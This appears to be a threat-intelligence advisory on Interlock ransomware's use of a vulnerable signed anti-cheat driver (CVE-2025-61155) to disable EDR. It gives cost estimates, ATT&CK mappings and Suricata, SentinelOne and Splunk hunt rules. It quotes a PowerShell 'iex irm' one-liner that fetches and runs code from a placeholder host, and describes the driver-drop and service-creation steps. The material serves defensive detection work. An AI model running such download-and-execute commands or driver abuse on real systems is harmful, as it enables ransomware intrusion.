BLUF

 Interlock ransomware operators are employing a Bring Your Own Vulnerable Driver (BYOVD) technique to disable EDR tools in the automotive and manufacturing sector. This attack specifically exploits a new zero-day in an anti-cheat driver to achieve kernel-level control.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

“For organizations affected by Interlock ransomware campaigns leveraging BYOVD techniques to disable endpoint defenses and deploy encryption-based extortion…”

·       Low-end total cost: $750K – $2.5M

o   (rapid containment, limited encryption scope, minimal regulatory exposure)

·       Typical expected range: $3M – $12M

o   (enterprise-wide response, downtime across manufacturing operations, extortion pressure)

·       Upper-bound realistic scenarios: $15M – $35M

o   (multi-site disruption, prolonged recovery, legal escalation, customer fallout)

Key Cost Drivers

·       Duration of operational shutdown in manufacturing/automotive environments

·       Extent of endpoint security impairment from kernel-level driver abuse

·       Scale of forensic restoration across servers, OT, and endpoints

·       Ransom negotiation, payment considerations, and recovery complexity

·       Regulatory notification requirements if sensitive data is accessed

·       Long-term customer and supplier confidence impacts

Targeted Sectors

·       Manufacturing

·       Automotive

·       Healthcare.

Targeted Countries

·       Global

o   U.S.

o   Europe

First Reported Activity

·       Feb 4, 2026

Last Reported Update

·       Feb 5, 2026

APT

·       This has not been associated to an APT group

Criminal Group

·       Interlock Ransomware

CVE-2025-61155

Zero-day in Anti-Cheat driver

CVSS 3.1

·       (5.5) AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Nessus ID

·       Not applicable

Is this on the KEV list?

·       No

Mitigation

·       Remove/disable the vulnerable driver where present

·       Block the driver by hash/cert/path using WDAC/AppLocker

·       Monitor for and prevent kernel-driver service creation from user-writable locations.

Malware Names

·       Interlock Ransomware

Malware sample

sha256

5c5598f7fb5bab3e2c18216764dbbff019f7f19d3801083e8fbf638ba02c6bca

Malware Family

·       Derived from or sharing codebase with the Rhysida family. It operates as a closed group rather than a standard RaaS model.

Known Decoding Key

 None currently available. Decryption requires a unique 60-character company ID and negotiation with the threat actors.

Verdict

Highly Malicious

Primary Objectives

·       Disable defenses

·       Sustain access

·       Deploy ransomware for encryption/extortion

Behavior Analysis

Driver drop + kernel service creation

·       Drop location example: E:\UpdateCheckerX64.sys

·       Service name pattern: UpdateCheckerX64_{random-numbers}

·       Windows APIs indicative: OpenSCManagerW, CreateServiceW, StartServiceW

Initial execution pattern

·       PowerShell iex $(irm http://<ip>:8080/<epoch_time_rounded>) style one-liner (defanged in Fortinet).

Node runtime staging

·       Download.zip containing node.exe + malicious .log JavaScript payload executed by Node.

TTPs

Initial Access

·       T1566.001 Phishing: Spearphishing Attachment

o   Common MintLoader delivery pattern (Fortinet describes MintLoader-origin compromise but not the exact lure; include as a likely mapping when MintLoader is involved).

·       T1204 User Execution

o   User runs/permits execution leading to MintLoader/PowerShell chain.

Execution

·       T1059.001 Command and Scripting Interpreter PowerShell

o   PowerShell downloads and executes remote payload.

·       T1059.007 JavaScript

o   Malicious JS executed via Node.js runtime.

Defense Evasion / Privilege Enablement

·       T1562.001 Impair Defenses Disable or Modify Tools

o   Process-killing tool attempts to terminate EDR/AV processes by abusing the vulnerable signed driver.

·       T1211 Exploitation for Defense Evasion

o   Leveraging a vulnerable (but signed) driver to gain kernel-mediated capability to kill protected processes (effectively bypassing user-mode protections).

Persistence / System Modification

·       T1543.003 Create or Modify System Process Windows Service

o   APIs used to create/start a service for a kernel driver (CreateServiceW/StartServiceW).

Lateral Movement / Remote Services

·       T1021.004 Remote Services SSH

o   lateral move to Nutanix system via SSH (Fortinet).

Impact

·       T1486 Data Encrypted for Impact

o   Ransomware encryption/extortion.

Suggested Rules / potential hunts

As a reminder, these are indicator rules. They are likely to be noisy.

For best results consider creating a data model and reviewing the traffic as a report.

Suricata

·       Detect suspicious PowerShell download pattern to :8080/<epoch> (tune for your environment; avoid false positives):

alert http $HOME_NET any -> $EXTERNAL_NET any (

  msg:"SUSPECT PowerShell IEX IRM epoch-path (MintLoader/Interlock staging)";

  flow:to_server,established;

  http.method; content:"GET"; nocase;

  http.uri; pcre:"/\/\d{9,10}$/";

  classtype:trojan-activity;

  sid:2506115501; rev:1;

)

·       Detect driver filename in SMB/HTTP transfers

alert http $HOME_NET any -> $EXTERNAL_NET any (

  msg:"SUSPECT transfer of UpdateCheckerX64.sys (Interlock BYOVD driver)";

  flow:to_server,established;

  file.name; content:"UpdateCheckerX64.sys"; nocase;

  classtype:trojan-activity;

  sid:2506115502; rev:1;

)

SentinelOne

·       Kernel driver service creation pattern

EventType = "Process Creation"

AND (ProcessName In ("sc.exe","powershell.exe","cmd.exe") OR ProcessCmdLine Contains "CreateService")

AND ProcessCmdLine Contains "UpdateCheckerX64"

·       Driver file write / rename

EventType In ("File Creation","File Modification")

AND (TargetFilePath EndsWith "\\UpdateCheckerX64.sys" OR TargetFilePath EndsWith "\\GameDriverX64.sys")

Splunk

·       Windows service install for kernel drivers (Security 4697 + System 7045 are common; adjust indexes/sourcetypes):

(index=wineventlog (EventCode=4697 OR EventCode=7045))

AND (ServiceName="UpdateCheckerX64*" OR ServiceFileName="*UpdateCheckerX64.sys*" OR ServiceFileName="*GameDriverX64.sys*")

| stats earliest(_time) as firstSeen latest(_time) as lastSeen values(ServiceName) values(ServiceFileName) values(user) by host

| convert ctime(firstSeen) ctime(lastSeen)

·       Suspicious PowerShell epoch URL pattern

index=wineventlog EventCode=4688 NewProcessName="*\\powershell.exe"

| eval cmd=lower(CommandLine)

| where like(cmd,"%iex%") AND like(cmd,"%irm%") AND match(cmd,":8080/\\d{9,10}")

| stats earliest(_time) as firstSeen latest(_time) as lastSeen values(CommandLine) by host AccountName

| convert ctime(firstSeen) ctime(lastSeen)

Delivery Method

·       Direct exploitation of vulnerable drivers within the target network (BYOVD).

References

NVD

·       hxxps://nvd.nist.gov/vuln/detail/CVE-2025-61155

GitHub

·       hxxps://github.com/advisories/GHSA-9qfv-m6w2-fhch

Fortinet

·       hxxps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks

VirusTotal

·       hxxps://www.virustotal.com/gui/file/a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642/details

ArcticWolf

·       hxxps://arcticwolf.com/resources/blog/threat-actor-profile-interlock-ransomware/

FortiGuard

·       hxxps://www.fortinet.com/blog/threat-research/ransomware-roundup-interlock